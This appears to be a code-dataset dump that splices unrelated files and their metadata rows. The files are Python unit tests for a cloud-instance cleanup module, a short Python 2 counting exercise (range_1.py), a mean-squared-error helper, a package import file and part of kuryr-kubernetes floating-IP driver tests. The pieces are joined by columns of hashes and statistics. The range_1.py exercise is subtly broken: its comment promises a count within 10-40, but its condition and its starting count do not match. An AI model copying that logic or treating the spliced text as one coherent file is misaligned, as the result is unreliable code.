self.fail('delete_instance_template_revision called')
self.mock(
cleanup.instance_templates,
'get_drained_instance_template_revisions',
get_drained_instance_template_revisions,
)
self.mock(
cleanup,
'delete_instance_template_revision',
delete_instance_template_revision,
)
cleanup.cleanup_instance_template_revisions()
self.failIf(models.InstanceTemplateRevision.query().count())
def test_deletes(self):
def get_drained_instance_template_revisions(*_args, **_kwargs):
return [
ndb.Key(models.InstanceTemplateRevision, 'fake-key-1'),
ndb.Key(models.InstanceTemplateRevision, 'fake-key-3'),
ndb.Key(models.InstanceTemplateRevision, 'fake-key-4'),
]
@ndb.tasklet
def delete_instance_template_revision(key):
yield key.delete_async()
self.mock(
cleanup.instance_templates,
'get_drained_instance_template_revisions',
get_drained_instance_template_revisions,
)
self.mock(
cleanup,
'delete_instance_template_revision',
delete_instance_template_revision,
)
models.InstanceTemplateRevision(
key=ndb.Key(models.InstanceTemplateRevision, 'fake-key-1'),
).put()
models.InstanceTemplateRevision(
key=ndb.Key(models.InstanceTemplateRevision, 'fake-key-2'),
).put()
models.InstanceTemplateRevision(
key=ndb.Key(models.InstanceTemplateRevision, 'fake-key-3'),
).put()
models.InstanceTemplateRevision(
key=ndb.Key(models.InstanceTemplateRevision, 'fake-key-4'),
).put()
cleanup.cleanup_instance_template_revisions(max_concurrent=2)
self.failIf(ndb.Key(models.InstanceTemplateRevision, 'fake-key-1').get())
self.failUnless(
ndb.Key(models.InstanceTemplateRevision, 'fake-key-2').get())
self.failIf(ndb.Key(models.InstanceTemplateRevision, 'fake-key-3').get())
self.failIf(ndb.Key(models.InstanceTemplateRevision, 'fake-key-4').get())
class CleanupInstanceTemplatesTest(test_case.TestCase):
"""Tests for cleanup.cleanup_instance_templates."""
def test_no_entities(self):
@ndb.tasklet
def delete_instance_template(*_args, **_kwargs):
self.fail('delete_instance_template called')
self.mock(
cleanup,
'delete_instance_template',
delete_instance_template,
)
cleanup.cleanup_instance_templates()
self.failIf(models.InstanceTemplate.query().count())
def test_deletes(self):
@ndb.tasklet
def delete_instance_template(key):
yield key.delete_async()
self.mock(
cleanup,
'delete_instance_template',
delete_instance_template,
)
models.InstanceTemplate(
key=ndb.Key(models.InstanceTemplate, 'fake-key-1'),
).put()
models.InstanceTemplate(
key=ndb.Key(models.InstanceTemplate, 'fake-key-2'),
).put()
models.InstanceTemplate(
key=ndb.Key(models.InstanceTemplate, 'fake-key-3'),
).put()
cleanup.cleanup_instance_templates(max_concurrent=2)
self.failIf(ndb.Key(models.InstanceTemplate, 'fake-key-1').get())
self.failIf(ndb.Key(models.InstanceTemplate, 'fake-key-2').get())
self.failIf(ndb.Key(models.InstanceTemplate, 'fake-key-3').get())
class DeleteInstanceGroupManagerTest(test_case.TestCase):
"""Tests for cleanup.delete_instance_group_manager."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
key = ndb.Key(models.InstanceGroupManager, 'fake-key')
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failIf(key.get())
def test_url_specified(self):
"""Ensures nothing happens when the entity still has a URL."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
url='url',
).put()
models.InstanceTemplateRevision(
key=key.parent(),
drained=[
key,
],
).put()
models.InstanceTemplate(
key=key.parent().parent(),
active=key.parent(),
).put()
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failUnless(key.get())
def test_active_instances(self):
"""Ensures nothing happens when there are active Instances."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
instances=[
ndb.Key(models.Instance, 'fake-key'),
],
).put()
models.InstanceTemplateRevision(
key=key.parent(),
drained=[
key,
],
).put()
models.InstanceTemplate(
key=key.parent().parent(),
active=key.parent(),
).put()
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failUnless(key.get())
def test_parent_doesnt_exist(self):
"""Ensures nothing happens when the parent doesn't exist."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
).put()
models.InstanceTemplate(
key=key.parent().parent(),
active=key.parent(),
).put()
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failUnless(key.get())
def test_root_doesnt_exist(self):
"""Ensures nothing happens when the root doesn't exist."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
).put()
models.InstanceTemplateRevision(
key=key.parent(),
drained=[
key,
],
).put()
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failUnless(key.get())
def test_active(self):
"""Ensures nothing happens when the entity is active."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
).put()
models.InstanceTemplateRevision(
key=key.parent(),
active=[
key,
],
).put()
models.InstanceTemplate(
key=key.parent().parent(),
active=key.parent(),
).put()
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failUnless(key.get())
def test_deletes_drained(self):
"""Ensures a drained entity is deleted."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
).put()
models.InstanceTemplateRevision(
key=key.parent(),
drained=[
ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
key,
ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
],
).put()
models.InstanceTemplate(
key=key.parent().parent(),
active=key.parent(),
).put()
expected_drained = [
ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
]
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failIf(key.get())
self.assertItemsEqual(key.parent().get().drained, expected_drained)
def test_deletes_implicitly_drained(self):
"""Ensures an implicitly drained entity is deleted."""
key = models.InstanceGroupManager(
key=instance_group_managers.get_instance_group_manager_key(
'base-name',
'revision',
'zone',
),
).put()
models.InstanceTemplateRevision(
key=key.parent(),
active=[
ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
key,
ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
],
).put()
models.InstanceTemplate(
key=key.parent().parent(),
drained=[
key.parent(),
],
).put()
expected_active = [
ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
]
future = cleanup.delete_instance_group_manager(key)
future.wait()
self.failIf(key.get())
self.assertItemsEqual(key.parent().get().active, expected_active)
class DeleteInstanceTemplateTest(test_case.TestCase):
"""Tests for cleanup.delete_instance_template."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
key = ndb.Key(models.InstanceTemplate, 'fake-key')
future = cleanup.delete_instance_template(key)
future.wait()
self.failIf(key.get())
def test_active_instance_template_revisions(self):
"""Ensures nothing happens when an instance template revision is active."""
key = models.InstanceTemplate(
active=ndb.Key(models.InstanceTemplateRevision, 'fake-key'),
).put()
future = cleanup.delete_instance_template(key)
future.wait()
self.failUnless(key.get())
def test_drained_instance_template_revisions(self):
"""Ensures nothing happens when instance template revisions are drained."""
key = models.InstanceTemplate(
drained=[
ndb.Key(models.InstanceTemplateRevision, 'fake-key'),
],
).put()
future = cleanup.delete_instance_template(key)
future.wait()
self.failUnless(key.get())
def test_deletes(self):
"""Ensures the entity is deleted."""
key = models.InstanceTemplate(
).put()
future = cleanup.delete_instance_template(key)
future.wait()
self.failIf(key.get())
class DeleteInstanceTemplateRevisionTest(test_case.TestCase):
"""Tests for cleanup.delete_instance_template_revision."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
key = ndb.Key(models.InstanceTemplateRevision, 'fake-key')
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failIf(key.get())
def test_url_specified(self):
"""Ensures nothing happens when the entity still has a URL."""
key = models.InstanceTemplateRevision(
key=instance_templates.get_instance_template_revision_key(
'base-name',
'revision',
),
url='url',
).put()
models.InstanceTemplate(
key=key.parent(),
drained=[
key,
],
).put()
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failUnless(key.get())
def test_active_instance_group_managers(self):
"""Ensures nothing happens when there are active InstanceGroupManagers."""
key = models.InstanceTemplateRevision(
key=instance_templates.get_instance_template_revision_key(
'base-name',
'revision',
),
active=[
ndb.Key(models.InstanceGroupManager, 'fake-key'),
],
).put()
models.InstanceTemplate(
key=key.parent(),
drained=[
key,
],
).put()
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failUnless(key.get())
def test_drained_instance_group_managers(self):
"""Ensures nothing happens when there are drained InstanceGroupManagers."""
key = models.InstanceTemplateRevision(
key=instance_templates.get_instance_template_revision_key(
'base-name',
'revision',
),
drained=[
ndb.Key(models.InstanceGroupManager, 'fake-key'),
],
).put()
models.InstanceTemplate(
key=key.parent(),
drained=[
key,
],
).put()
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failUnless(key.get())
def test_parent_doesnt_exist(self):
"""Ensures nothing happens when the parent doesn't exist."""
key = models.InstanceTemplateRevision(
key=instance_templates.get_instance_template_revision_key(
'base-name',
'revision',
),
).put()
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failUnless(key.get())
def test_active(self):
"""Ensures nothing happens when the entity is active."""
key = models.InstanceTemplateRevision(
key=instance_templates.get_instance_template_revision_key(
'base-name',
'revision',
),
).put()
models.InstanceTemplate(
key=key.parent(),
active=key,
).put()
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failUnless(key.get())
def test_deletes(self):
"""Ensures the entity is deleted."""
key = models.InstanceTemplateRevision(
key=instance_templates.get_instance_template_revision_key(
'base-name',
'revision',
),
).put()
models.InstanceTemplate(
key=key.parent(),
drained=[
ndb.Key(models.InstanceTemplateRevision, 'fake-key-1'),
key,
ndb.Key(models.InstanceTemplateRevision, 'fake-key-2'),
],
).put()
expected_drained = [
ndb.Key(models.InstanceTemplateRevision, 'fake-key-1'),
ndb.Key(models.InstanceTemplateRevision, 'fake-key-2'),
]
future = cleanup.delete_instance_template_revision(key)
future.wait()
self.failIf(key.get())
self.assertItemsEqual(key.parent().get().drained, expected_drained)
class ExistsTest(test_case.TestCase):
"""Tests for cleanup.exists."""
def test_exists(self):
"""Ensures an existing entity can be detected."""
def json_request(*_args, **_kwargs):
return {}
self.mock(cleanup.net, 'json_request', json_request)
self.failUnless(cleanup.exists('instance'))
def test_not_found(self):
"""Ensures a non-existant entity can be detected."""
def json_request(*_args, **_kwargs):
raise net.NotFoundError('404', 404, '404')
self.mock(cleanup.net, 'json_request', json_request)
self.failIf(cleanup.exists('instance'))
def test_error(self):
"""Ensures errors are surfaced."""
def json_request(*_args, **_kwargs):
raise net.AuthError('403', 403, '403')
self.mock(cleanup.net, 'json_request', json_request)
self.assertRaises(net.AuthError, cleanup.exists, 'instance')
class SetInstanceDeletedTest(test_case.TestCase):
"""Tests for cleanup.set_instance_deleted."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
key = ndb.Key(models.Instance, 'fake-key')
cleanup.set_instance_deleted(key, False)
self.failIf(key.get())
def test_not_drained_or_pending_deletion(self):
"""Ensures nothing happens when the entity isn't drained or pending."""
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
pending_deletion=False,
).put()
cleanup.set_instance_deleted(key, False)
self.failIf(key.get().deleted)
def test_drained(self):
"""Ensures the entity is marked as deleted when drained."""
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
pending_deletion=False,
).put()
cleanup.set_instance_deleted(key, True)
self.failUnless(key.get().deleted)
def test_pending_deletion(self):
"""Ensures the entity is marked as deleted when pending deletion."""
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
pending_deletion=True,
).put()
cleanup.set_instance_deleted(key, False)
self.failUnless(key.get().deleted)
if __name__ == '__main__':
unittest.main()
| 28.913592
| 80
| 0.652463
| 3,291
| 29,781
| 5.682163
| 0.051656
| 0.040428
| 0.060963
| 0.052888
| 0.913583
| 0.896203
| 0.883957
| 0.837701
| 0.793262
| 0.715455
| 0
| 0.004064
| 0.22333
| 29,781
| 1,029
| 81
| 28.941691
| 0.80441
| 0.100534
| 0
| 0.83522
| 0
| 0
| 0.080036
| 0.015313
| 0
| 0
| 0
| 0
| 0.005031
| 1
| 0.093082
| false
| 0.005031
| 0.012579
| 0.007547
| 0.127044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38d363491b8c53a3dc9953105a2b7f03652007bd
| 775
|
py
|
Python
|
range_1.py
|
Krishna-Aaseri/Python_Logical_Questions
|
c0f025a56dbbf85426142adb423b25fa7b034adb
|
[
"MIT"
] | null | null | null |
range_1.py
|
Krishna-Aaseri/Python_Logical_Questions
|
c0f025a56dbbf85426142adb423b25fa7b034adb
|
[
"MIT"
] | null | null | null |
range_1.py
|
Krishna-Aaseri/Python_Logical_Questions
|
c0f025a56dbbf85426142adb423b25fa7b034adb
|
[
"MIT"
] | null | null | null |
# num = [10, 20, 30, 40, 50, 40, 40, 60, 70] #range: 40-80
# i = 0
# count = 0
# while i < len(num):
# if num[i] >= 40 and num[i] < 80:
# count = count + 1
# i = i + 1
# print count
#===========================================================================
# Input : [10, 20, 30, 40, 50, 40, 40, 60, 70] range: 10-40
# Output : 4
num = [10, 20, 30, 40, 50, 40, 40, 60, 70] #range: 10-40
i = 0
count = 1
while i < len(num):
if num[i] > 10 and num[i] > 40:
count = count + 1
i = i + 1
print count
#=====================================================================
# def add(num):
# i = 0
# count = 0
# while i < len(num):
# if num[i] >= 40 and num[i] < 80:
# count = count + 1
# i = i + 1
# print count
# add([10, 20, 30, 40, 50, 40, 40, 60, 70] )
| 23.484848
| 76
| 0.402581
| 126
| 775
| 2.47619
| 0.190476
| 0.089744
| 0.076923
| 0.102564
| 0.849359
| 0.849359
| 0.849359
| 0.791667
| 0.714744
| 0.657051
| 0
| 0.18569
| 0.242581
| 775
| 32
| 77
| 24.21875
| 0.345826
| 0.735484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
38dd53f3d3c85d00e41321871c4bd3ae8cd9e2b4
| 74
|
py
|
Python
|
HW2/scripts/utils.py
|
UltronAI/Stochastic-Process
|
edbfe0eb2b62758e093306d18ba5a96415572be1
|
[
"MIT"
] | null | null | null |
HW2/scripts/utils.py
|
UltronAI/Stochastic-Process
|
edbfe0eb2b62758e093306d18ba5a96415572be1
|
[
"MIT"
] | null | null | null |
HW2/scripts/utils.py
|
UltronAI/Stochastic-Process
|
edbfe0eb2b62758e093306d18ba5a96415572be1
|
[
"MIT"
] | null | null | null |
import numpy as np
def mse(y_pred, y):
return np.mean((y-y_pred)**2)
| 14.8
| 33
| 0.648649
| 16
| 74
| 2.875
| 0.6875
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.189189
| 74
| 4
| 34
| 18.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
38e5678d4874768a9fa0f7f1d27950c976ffddc0
| 111
|
py
|
Python
|
pynumdiff/nnet/__init__.py
|
fossabot/PyNumDiff
|
dccad2ad7a875f2ecccb0db2bb6e2afa392916d1
|
[
"MIT"
] | null | null | null |
pynumdiff/nnet/__init__.py
|
fossabot/PyNumDiff
|
dccad2ad7a875f2ecccb0db2bb6e2afa392916d1
|
[
"MIT"
] | null | null | null |
pynumdiff/nnet/__init__.py
|
fossabot/PyNumDiff
|
dccad2ad7a875f2ecccb0db2bb6e2afa392916d1
|
[
"MIT"
] | null | null | null |
from pynumdiff.nnet.__nnet__ import adam as adam
from pynumdiff.nnet.__nnet__ import quasinewton as quasinewton
| 55.5
| 62
| 0.864865
| 16
| 111
| 5.5
| 0.4375
| 0.295455
| 0.386364
| 0.477273
| 0.613636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099099
| 111
| 2
| 62
| 55.5
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
38e6861c9f7806a7f307034ecf8801bb12087614
| 14,973
|
py
|
Python
|
kuryr_kubernetes/tests/unit/controller/drivers/test_lb_public_ip.py
|
ragilsetian/kuryr-k8s
|
922baf3fcd68517427da861939fcf6832708fc4f
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_lb_public_ip.py
|
ragilsetian/kuryr-k8s
|
922baf3fcd68517427da861939fcf6832708fc4f
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_lb_public_ip.py
|
ragilsetian/kuryr-k8s
|
922baf3fcd68517427da861939fcf6832708fc4f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2017 RedHat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import munch
from openstack import exceptions as os_exc
from unittest import mock
from kuryr_kubernetes.controller.drivers import lb_public_ip\
as d_lb_public_ip
from kuryr_kubernetes.controller.drivers import public_ip
from kuryr_kubernetes.objects import lbaas as obj_lbaas
from kuryr_kubernetes.tests import base as test_base
from kuryr_kubernetes.tests.unit import kuryr_fixtures as k_fix
from oslo_config import cfg
class TestFloatingIpServicePubIPDriverDriver(test_base.TestCase):
def test_acquire_service_pub_ip_info_clusterip(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
project_id = mock.sentinel.project_id
cur_service_pub_ip_info = None
service = {'spec': {'type': 'ClusterIP'}}
result = cls.acquire_service_pub_ip_info(m_driver, service, project_id,
cur_service_pub_ip_info)
self.assertIsNone(result)
def test_acquire_service_pub_ip_info_usr_specified_ip(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
fip = munch.Munch({'floating_ip_address': '1.2.3.4',
'port_id': None,
'id': 'a2a62ea7-e3bf-40df-8c09-aa0c29876a6b'})
os_net.ips.return_value = (ip for ip in [fip])
project_id = mock.sentinel.project_id
spec_type = 'LoadBalancer'
spec_lb_ip = '1.2.3.4'
expected_resp = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='user'))
result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
spec_lb_ip, project_id)
self.assertEqual(result, expected_resp)
def test_acquire_service_pub_ip_info_user_specified_non_exist_fip(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'port_id': None})
os_net.ips.return_value = (ip for ip in [fip])
project_id = mock.sentinel.project_id
spec_type = 'LoadBalancer'
spec_lb_ip = '1.2.3.4'
result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
spec_lb_ip, project_id)
self.assertIsNone(result)
def test_acquire_service_pub_ip_info_user_specified_occupied_fip(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
fip = munch.Munch({'floating_ip_address': '1.2.3.4',
'port_id': 'ec29d641-fec4-4f67-928a-124a76b3a8e6'})
os_net.ips.return_value = (ip for ip in [fip])
project_id = mock.sentinel.project_id
spec_type = 'LoadBalancer'
spec_lb_ip = '1.2.3.4'
result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
spec_lb_ip, project_id)
self.assertIsNone(result)
@mock.patch('kuryr_kubernetes.config.CONF')
def test_acquire_service_pub_ip_info_pool_net_not_defined(self, m_cfg):
driver = d_lb_public_ip.FloatingIpServicePubIPDriver()
public_net = ''
m_cfg.neutron_defaults.external_svc_net = public_net
os_net = self.useFixture(k_fix.MockNetworkClient()).client
os_net.ips.return_value = (ip for ip in [])
project_id = mock.sentinel.project_id
spec_type = 'LoadBalancer'
spec_lb_ip = None
self.assertRaises(cfg.RequiredOptError,
driver.acquire_service_pub_ip_info,
spec_type, spec_lb_ip, project_id)
@mock.patch('kuryr_kubernetes.config.CONF')
def test_acquire_service_pub_ip_info_pool_subnet_is_none(self, m_cfg):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
public_net = mock.sentinel.public_subnet
m_cfg.neutron_defaults.external_svc_net = public_net
m_cfg.neutron_defaults.external_svc_subnet = None
os_net.get_subnet.return_value = munch.Munch(
{'network_id': 'ec29d641-fec4-4f67-928a-124a76b3a8e6'})
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
os_net.create_ip.return_value = fip
project_id = mock.sentinel.project_id
spec_type = 'LoadBalancer'
spec_lb_ip = None
expected_resp = obj_lbaas.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='pool')
result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
spec_lb_ip, project_id)
self.assertEqual(result, expected_resp)
@mock.patch('kuryr_kubernetes.config.CONF')
def test_acquire_service_pub_ip_info_alloc_from_pool(self, m_cfg):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
m_cfg.neutron_defaults.external_svc_subnet = (mock.sentinel
.external_svc_subnet)
os_net.get_subnet.return_value = munch.Munch(
{'network_id': 'ec29d641-fec4-4f67-928a-124a76b3a8e6'})
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
os_net.create_ip.return_value = fip
project_id = mock.sentinel.project_id
spec_type = 'LoadBalancer'
spec_lb_ip = None
expected_resp = obj_lbaas.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='pool')
result = cls.acquire_service_pub_ip_info(m_driver, spec_type,
spec_lb_ip, project_id)
self.assertEqual(result, expected_resp)
def test_release_pub_ip_empty_lb_ip_info(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
service_pub_ip_info = None
rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
self.assertIs(rc, True)
def test_release_pub_ip_alloc_method_non_pool(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='kk'))
rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
self.assertIs(rc, True)
def test_release_pub_ip_alloc_method_user(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='user'))
rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
self.assertIs(rc, True)
def test_release_pub_ip_alloc_method_pool_neutron_exception(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
os_net.delete_ip.side_effect = os_exc.SDKException
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='pool'))
rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
self.assertIs(rc, False)
def test_release_pub_ip_alloc_method_pool_neutron_succeeded(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
self.useFixture(k_fix.MockNetworkClient()).client
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='pool'))
rc = cls.release_pub_ip(m_driver, service_pub_ip_info)
self.assertIs(rc, True)
def test_associate_pub_ip_empty_params(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
os_net = self.useFixture(k_fix.MockNetworkClient()).client
os_net.update_floatingip.return_value = None
service_pub_ip_info = None
vip_port_id = None
result = cls.associate_pub_ip(m_driver, service_pub_ip_info,
vip_port_id)
self.assertIsNone(result)
def test_associate_lb_fip_id_not_exist(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
os_net = self.useFixture(k_fix.MockNetworkClient()).client
os_net.update_floatingip.return_value = None
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=0,
ip_addr=fip.floating_ip_address,
alloc_method='pool'))
vip_port_id = 'ec29d641-fec4-4f67-928a-124a76b3a777'
result = cls.associate_pub_ip(m_driver, service_pub_ip_info,
vip_port_id)
self.assertIsNone(result)
def test_associate_lb_fip_id_not_exist_neutron_exception(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
os_net.update_ip.side_effect = os_exc.SDKException
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='pool'))
vip_port_id = 'ec29d641-fec4-4f67-928a-124a76b3a777'
self.assertRaises(os_exc.SDKException, cls.associate_pub_ip,
m_driver, service_pub_ip_info, vip_port_id)
def test_disassociate_pub_ip_empty_param(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
self.useFixture(k_fix.MockNetworkClient()).client
service_pub_ip_info = None
result = cls.disassociate_pub_ip(m_driver, service_pub_ip_info)
self.assertIsNone(result)
def test_disassociate_pub_ip_fip_id_not_exist(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
os_net.update_floatingip.return_value = None
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=0,
ip_addr=fip.floating_ip_address,
alloc_method='pool'))
result = cls.disassociate_pub_ip(m_driver, service_pub_ip_info)
self.assertIsNone(result)
def test_disassociate_pub_ip_neutron_exception(self):
cls = d_lb_public_ip.FloatingIpServicePubIPDriver
m_driver = mock.Mock(spec=cls)
m_driver._drv_pub_ip = public_ip.FipPubIpDriver()
os_net = self.useFixture(k_fix.MockNetworkClient()).client
